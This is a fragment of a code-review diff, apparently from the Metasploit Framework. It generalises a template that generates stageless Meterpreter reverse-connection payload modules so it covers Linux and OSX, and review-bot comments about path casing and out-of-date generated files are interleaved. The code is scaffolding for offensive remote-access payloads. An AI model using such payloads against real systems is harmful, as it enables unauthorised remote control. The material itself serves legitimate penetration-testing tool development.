+ filename = File::join('modules', 'payloads', 'singles', platform, arch, "meterpreter_reverse_#{scheme}.rb")
 File::write(filename, renderer.result())
 end
 end
diff --git a/tools/modules/linux_meterpreter_reverse.erb b/tools/modules/meterpreter_reverse.erb
similarity index 72%
rename from tools/modules/linux_meterpreter_reverse.erb
rename to tools/modules/meterpreter_reverse.erb
index bffd3a8edb17..6ff39341d041 100644
--- a/tools/modules/linux_meterpreter_reverse.erb
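Review bot: The output path in `generate_mettle_payloads.rb` is built from `platform` exactly as it is spelled in `arches` (`'Linux'`, `'OSX'`), so the new `filename` points at `singles/Linux/...` and `singles/OSX/...`, while every module path in this change is lowercase `linux` or `osx`. On a case-sensitive filesystem that write would miss the existing directories. The template already uses `platform.downcase` for the require path and for `'Platform'`, and the same is needed here: `filename = File::join('modules', 'payloads', 'singles', platform.downcase, arch, "meterpreter_reverse_#{scheme}.rb")`. Separately, the template read and `ERB.new` now run once per arch/scheme pair although neither depends on the loop variables; both lines can stay above `arches.each` as they were.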
+++ b/tools/modules/meterpreter_reverse.erb
@@ -6,7 +6,7 @@
 require 'msf/core/handler/reverse_<%= scheme %>'
 require 'msf/base/sessions/meterpreter_options'
 require 'msf/base/sessions/mettle_config'
-require 'msf/base/sessions/meterpreter_<%= arch %>_linux'
+require 'msf/base/sessions/meterpreter_<%= arch %>_<%= platform.downcase %>'
 module MetasploitModule
@@ -18,23 +18,27 @@ module MetasploitModule
 super(
 update_info(
 info,
- 'Name' => 'Linux Meterpreter, Reverse <%= scheme.upcase %> Inline',
+ 'Name' => '<%= platform %> Meterpreter, Reverse <%= scheme.upcase %> Inline',
 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
 'Author' => [
 'Adam Cammack ',
- 'Brent Cook '
+ 'Brent Cook ',
+ 'timwr'
 ],
- 'Platform' => 'linux',
+ 'Platform' => '<%= platform.downcase %>',
 'Arch' => ARCH_<%= arch.upcase %>,
 'License' => MSF_LICENSE,
 'Handler' => Msf::Handler::Reverse<%= scheme.capitalize %>,
- 'Session' => Msf::Sessions::Meterpreter_<%= arch %>_Linux
+ 'Session' => Msf::Sessions::Meterpreter_<%= arch %>_<%= platform %>
 )
 )
 end
 def generate
- opts = {scheme: '<%= scheme %>'}
+ opts = {
+ scheme: '<%= scheme %>',
+ stageless: true
+ }
 MetasploitPayloads::Mettle.new('<%= payload %>', generate_config(opts)).to_binary :exec
 end
 end
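Review bot: The modules checked in with this change do not match what `meterpreter_reverse.erb` now renders. The three `osx/x64` modules list two authors while the template's `'Author'` array gains `'timwr'`, and the Linux modules show only a `CachedSize` change although `generate` in the template now also sets `stageless: true`. If those files are meant to be generator output, rerunning the generator and committing the result would bring them back in line; otherwise the next regeneration will apparently rewrite all of them. A template comment stating that `platform` is expected in its display form (`'Linux'`, `'OSX'`) would also help, since the same value feeds both `'Name'` and the `Meterpreter_<arch>_<platform>` class suffix.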